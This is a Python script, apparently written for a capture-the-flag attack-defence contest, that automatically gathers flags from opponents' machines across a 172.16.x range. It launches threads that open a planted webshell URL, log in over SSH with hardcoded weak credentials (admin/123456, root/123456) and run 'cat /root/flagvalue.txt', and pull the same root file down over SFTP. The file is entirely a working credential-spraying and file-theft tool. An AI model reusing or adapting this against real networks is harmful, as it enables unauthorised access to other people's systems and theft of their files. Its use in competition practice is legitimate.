'''
scanFlag.py 自动获取flag by 郑瑞国
'''
import paramiko
import webbrowser
import threading
import time
def webConnect(ip):
webbrowser.open('http://'+ip+'/html/WebShell.php')
time.sleep(0.5)
def ftpConnect(ip,user,pwd):
try:
transport = paramiko.Transport((ip, 22))
transport.connect(username=user,password=pwd)
sftp = paramiko.SFTPClient.from_transport(transport)
# 将remove_path 下载到本地 local_path
sftp.get('/root/flagvalue.txt', 'flagvalue'+ip+'.txt')
print(ip,'ftp get flag OK',user)
transport.close()
return 1
except:
print(ip,'ftp no connect',user)
def sshConnect(ip,user,pwd):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname=ip,port=22,username=user,password=pwd,timeout=1)
flag = ssh.exec_command('cat /root/flagvalue.txt')[1].readlines()
print(ip,'flag:')
for line in flag:
print(line)
ssh.close()
return 1
except:
print(ip,'ssh no connect',user)
def scanAll(firstNet,endNet,user1,pass1,user2,pass2):
for net in range(firstNet,endNet):
ip = '172.16.'+str(net)+'.24'
#print(ip)
threading._start_new_thread(webConnect,(ip,))
time.sleep(0.5)
threading._start_new_thread(sshConnect,(ip,user1,pass1))
time.sleep(0.5)
threading._start_new_thread(ftpConnect,(ip,user1,pass1))
time.sleep(0.5)
threading._start_new_thread(sshConnect,(ip,user2,pass2))
time.sleep(0.5)
threading._start_new_thread(ftpConnect,(ip,user2,pass2))
time.sleep(0.5)
if __name__=='__main__':
##scanAll(firstNet,endNet,user1,pass1,user2,pass2)
scanAll(101,109,'admin','123456','root','123456')